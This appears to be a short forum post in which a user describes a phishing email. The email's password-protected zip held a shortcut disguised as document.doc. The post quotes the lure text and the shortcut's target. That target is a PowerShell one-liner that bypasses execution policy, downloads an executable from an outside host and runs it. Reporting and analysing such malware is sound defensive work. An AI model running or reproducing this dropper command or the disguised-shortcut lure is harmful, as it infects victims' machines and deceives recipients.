Malware .lnk shortcut

A user got sent a email saying:

Hello, you can find your document in the attachment. The archive password is the name of the president of the united states. Please reply as soon as possible. Kind regards, GSD Support.

with a zipfile attached

zipfile contains document.doc but it has a compounding extension document.doc.lnk. I was able to see the hidden extension through terminal.

when opening the properties of the the lnk file under target it has a power shell script:

%windir%\System32\cmd.exe /c powershell.exe ExecutionPolicy Bypass (New-Object System.Net.WebClient).DownloadFile("http://twizt.net/spl.exe","%userprofile%\windrv.exe");Start-Process "%userprofile%\windrv.exe"